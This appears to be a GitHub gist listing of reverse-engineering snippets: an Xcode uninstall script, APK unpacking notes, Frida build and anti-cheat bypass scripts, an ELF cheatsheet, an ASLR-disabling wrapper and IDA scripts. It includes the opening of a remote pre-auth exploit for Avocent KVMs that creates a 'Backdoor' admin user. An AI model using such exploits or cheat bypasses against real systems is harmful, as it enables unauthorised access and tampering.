ApkUnpacker apkunpacker
@apkunpacker
apkunpacker / xcode-uninstall.sh
Created October 22, 2024 15:25 — forked from oxlb/xcode-uninstall.sh
SH file to uninstall Xcode from MacOS
#!/bin/sh
# Stop any running Xcode instance before removing files
killall Xcode
# Purge the xcrun developer-tool cache
xcrun -k
# Clean build products for all targets of the project in the current directory
xcodebuild -alltargets clean
# Remove clang module caches
rm -rf "$(getconf DARWIN_USER_CACHE_DIR)/org.llvm.clang/ModuleCache"
rm -rf "$(getconf DARWIN_USER_CACHE_DIR)/org.llvm.clang.$(whoami)/ModuleCache"
# Remove the application bundle and the per-user Xcode data
rm -rf /Applications/Xcode.app
rm -rf ~/Library/Caches/com.apple.dt.Xcode
rm -rf ~/Library/Developer
rm -rf ~/Library/MobileDevice
rm -rf ~/Library/Preferences/com.apple.dt.Xcode.plist

Zimperium zShield RE Notes

Newer versions of the Rabbit R1's APK are protected by https://www.zimperium.com/zshield/ (I don't know this for certain, somebody told me it is but I haven't really seen any identifying marks in the code yet)

Interesting assets within the APK:

lib/arm64-v8a/liboptipkawfn.so - ~3MB packed/encrypted ELF
assets/optipkawfn/0.odex - only 41 bytes (EDIT: I think this is part of an asset obfuscation scheme; the real file contents are likely elsewhere - inside the .szip maybe?)
assets/optipkawfn.szip - ~8MB; I predict it contains encrypted+compressed bytecode
@apkunpacker
apkunpacker / guide.md
Created July 26, 2024 15:00 — forked from miticollo/build_frida.sh
How to build Frida (≥ 16.2.2) for iOS jailbroken devices

Here, I'll show you how to compile Frida (≥ 16.2.2) for both rootful and rootless jailbreaks.

Old Instructions

If you want to compile an old version of Frida (< 16.2.2) you can use my old guide.

Build Instructions

Requirements

@apkunpacker
apkunpacker / index.ts
Created July 14, 2024 13:54 — forked from commonuserlol/index.ts
ACTk ObscuredTypes hax with frida; tested on 2.0.2
import "frida-il2cpp-bridge";

function main() {
    const AssemblyCSharp = Il2Cpp.domain.assembly("Assembly-CSharp").image;
    // Note that on versions older than 2.x.y this isn't needed,
    // since ACTk was bundled directly into Assembly-CSharp
    const ACTk_Runtime = Il2Cpp.domain.assembly("ACTk.Runtime").image;
    // Target class
    const PlayerData = AssemblyCSharp.class("PlayerData");

ELF Format Cheatsheet

Introduction

The Executable and Linkable Format (ELF) is the default binary format on Linux-based systems.

ELF

Compilation

@apkunpacker
apkunpacker / asmpwn.py
Created December 9, 2023 06:59 — forked from aemmitt-ns/asmpwn.py
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys

p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)

# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks  # python closes out of scope sockets
    port = 3211  # this is hardcoded in the binary
    print(f"[*] Exploiting ASMP on {hostname} port {port}")
@apkunpacker
apkunpacker / load_wrapper.cc
Created November 22, 2023 02:12 — forked from singleghost2/load_wrapper.cc
Disable ASLR on macOS for dylib include those loaded with `dlopen`
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <spawn.h>
#include <sys/wait.h>
#include <string.h>
/* ASLR disabling magic constant from Apple LLDB source code
https://opensource.apple.com/source/lldb/lldb-76/tools/darwin-debug/darwin-debug.cpp
*/
@apkunpacker
apkunpacker / outline_graph.py
Created October 25, 2023 10:02 — forked from NyaMisty/outline_graph.py
IDA Graph view with outlined function included
"""
summary: drawing custom graphs
description:
Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
show how to write actions that can be performed on those.
keywords: graph, actions
"""
from __future__ import print_function
# -----------------------------------------------------------------------
from idautils import Segments, Functions, XrefsTo, XrefTypeName
from idc import get_segm_name, get_segm_end

class Dictionary(dict):
    def add(self, key, value):
        self[key] = value

xref_dict = Dictionary()
for segea in Segments():